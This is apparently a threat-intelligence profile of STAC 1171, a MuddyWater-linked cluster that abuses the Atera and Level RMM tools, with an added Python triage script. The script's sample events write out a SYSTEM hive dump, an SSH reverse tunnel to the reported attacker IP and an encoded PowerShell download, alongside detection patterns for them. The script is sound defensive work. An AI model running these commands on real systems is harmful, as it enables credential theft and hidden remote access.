STAC 1171
STAC 1171 is a Sophos-tracked activity cluster that Sophos assesses, with moderate confidence, to be related to the Iranian threat actor MuddyWater (also tracked as TA450), based on overlap in indicators and TTPs with Proofpoint reporting.

Sophos observed the cluster in a phishing-led intrusion campaign. Victims were directed, via a shared document hosted on Onehub, to download a ZIP archive containing a compressed installer for Atera, a legitimate remote monitoring and management (RMM) tool. Once Atera Agent was installed, the operators used Atera's remote run commands to execute a PowerShell script named a.ps1 intended to dump credentials and to create a backup of the SYSTEM registry hive. Observed post-compromise activity included domain enumeration, creation of an SSH tunnel to 51.16.209[.]105, and an obfuscated PowerShell command that downloaded the Level RMM tool from downloads.level.io. Because the tooling is legitimate RMM software rather than custom malware, detection rests on the delivery path and on what the agent is used to run, not on the installer itself.

The first tracked incident occurred in November against an organization in Israel; Sophos also observed similar telemetry affecting a non-MDR customer in the United States. Aliases named directly in the reporting are MuddyWater and TA450.
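As an added worked example (not Sophos or Mallory code), the Python below triages constructed process-creation events for the chain summarized above: PowerShell launched by the Atera agent, a backup of the SYSTEM hive, an ssh.exe tunnel to the reported IP, and a download from downloads.level.io hidden inside a PowerShell -EncodedCommand blob. The event field names, the Atera agent process name and install path, reg.exe as the hive-backup mechanism, the file names, and every sample event are assumptions constructed for illustration; only the IP, the download host, the script name a.ps1 and the tool names come from the summary.

```python
"""Triage of process-creation events for the STAC 1171 chain summarized above.

Added example, not Sophos or Mallory code. The field names (parent_image,
image, command_line), the Atera process name and install path, reg.exe as the
SYSTEM hive backup mechanism, and every sample event are constructed
assumptions for illustration.
"""
import base64
import binascii
import re
from typing import Dict, List, Tuple

# Indicators from the summary above; the IP is kept defanged as written there.
LEVEL_DOWNLOAD_HOST = "downloads.level.io"
SSH_TUNNEL_IP_DEFANGED = "51.16.209[.]105"

# powershell -EncodedCommand / -enc / -e takes base64 of a UTF-16LE string.
ENC_FLAG = re.compile(r"-(?:encodedcommand|enc|en|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)
HIVE_BACKUP = re.compile(r"\breg(?:\.exe)?\s+save\b.*\b(?:hklm|hkey_local_machine)\\system\b")
SSH_FORWARD = re.compile(r"\s-[rld]\s")  # ssh -R / -L / -D port forwarding


def refang(ioc: str) -> str:
    """Turn a defanged indicator such as 51.16.209[.]105 back into a matchable string."""
    return ioc.replace("[.]", ".")


def decode_encoded_command(command_line: str) -> str:
    """Return the decoded payload of an -EncodedCommand launch, or "" if there is none.

    An obfuscated launch hides the download host inside the base64 blob, so the
    rules below must look at the decoded text, not only at the raw command line.
    """
    m = ENC_FLAG.search(command_line)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return ""


def _is_powershell(image: str) -> bool:
    return image.lower().rsplit("\\", 1)[-1] in ("powershell.exe", "pwsh.exe")


def triage_event(ev: Dict[str, str]) -> List[str]:
    """Return the names of every rule the event trips (empty list if none)."""
    parent = ev.get("parent_image", "").lower()
    image = ev.get("image", "").lower()
    raw = ev.get("command_line", "")
    text = (raw + " " + decode_encoded_command(raw)).lower()
    hits: List[str] = []

    # 1. RMM agent spawning PowerShell: Atera remote run commands launched a.ps1.
    #    Matching the parent on "atera" assumes the agent's process name contains it.
    if "atera" in parent and _is_powershell(image):
        hits.append("rmm_spawned_powershell")
    # 2. Backup of the SYSTEM hive, whose boot key is needed to decrypt SAM/LSA secrets.
    if HIVE_BACKUP.search(text):
        hits.append("system_hive_backup")
    # 3. ssh.exe reaching the reported tunnel endpoint, or using any port-forward flag.
    if image.endswith("ssh.exe") and (refang(SSH_TUNNEL_IP_DEFANGED) in text or SSH_FORWARD.search(text)):
        hits.append("ssh_tunnel")
    # 4. Level RMM download; with -enc this is visible only after decoding.
    if LEVEL_DOWNLOAD_HOST in text:
        hits.append("level_rmm_download")
    return hits


def triage(events: List[Dict[str, str]]) -> List[Tuple[int, List[str]]]:
    """Index every event that trips at least one rule."""
    return [(i, triage_event(ev)) for i, ev in enumerate(events) if triage_event(ev)]


def build_sample_events() -> List[Dict[str, str]]:
    """Constructed sample telemetry (not real log data) mimicking the reported chain."""
    ps = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    atera = "C:\\Program Files\\ATERA Networks\\AteraAgent\\AteraAgent.exe"  # assumed path
    # Constructed -enc launch: the Level host appears only inside the base64 blob.
    hidden = "iwr https://downloads.level.io/ -OutFile $env:TEMP\\level.msi"
    enc = base64.b64encode(hidden.encode("utf-16-le")).decode()
    return [
        {"parent_image": "C:\\Windows\\explorer.exe", "image": ps,
         "command_line": "powershell.exe -NoProfile Get-Date"},  # benign admin use
        {"parent_image": atera, "image": ps,
         "command_line": "powershell.exe -ExecutionPolicy Bypass -File C:\\Windows\\Temp\\a.ps1"},
        {"parent_image": ps, "image": "C:\\Windows\\System32\\reg.exe",
         "command_line": "reg save HKLM\\SYSTEM C:\\Windows\\Temp\\sys.hiv"},
        {"parent_image": ps, "image": "C:\\Windows\\System32\\OpenSSH\\ssh.exe",
         "command_line": "ssh.exe -N -R 3389:127.0.0.1:3389 user@51.16.209.105"},
        {"parent_image": atera, "image": ps,
         "command_line": "powershell.exe -nop -w hidden -enc " + enc},
    ]


if __name__ == "__main__":
    for idx, rules in triage(build_sample_events()):
        print(f"event {idx}: {', '.join(rules)}")
```

The decoding step is the point worth keeping when adapting this to a SIEM rule: the summary describes the Level RMM download as an obfuscated PowerShell command, so a rule that only string-matches the raw command line for downloads.level.io misses it, while a rule that decodes -EncodedCommand first catches it alongside the plain-text launches.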
Targeting
Who, where, and (when attributed) which flag flies behind the operation. Pulled from open-source reporting and Mallory's analyst review.
Where they target
Geographies tied to known operations.
- 🇮🇱 Israel
- 🇺🇸 United States
Where they're from
Attributed origin per open-source reporting.
- IR (Iran)
Tradecraft
10 distinct techniques observed across reporting, grouped by tactic.
Associated malware families
1 malware family attributed to this actor across reporting.
Observables
3 indicators attributed to this actor: domains, IPs, hashes, and other artifacts pulled from reporting.
Recent activity
2 sources tracked across advisories, community write-ups, and news.
Both tracked sources describe the same activity:

- Conducting targeted phishing campaigns to trick victims into downloading and installing legitimate RMM tools such as Atera, then using the tool's remote execution and PowerShell to dump credentials, save the SYSTEM registry hive, enumerate domains, establish an SSH tunnel, and download Level RMM.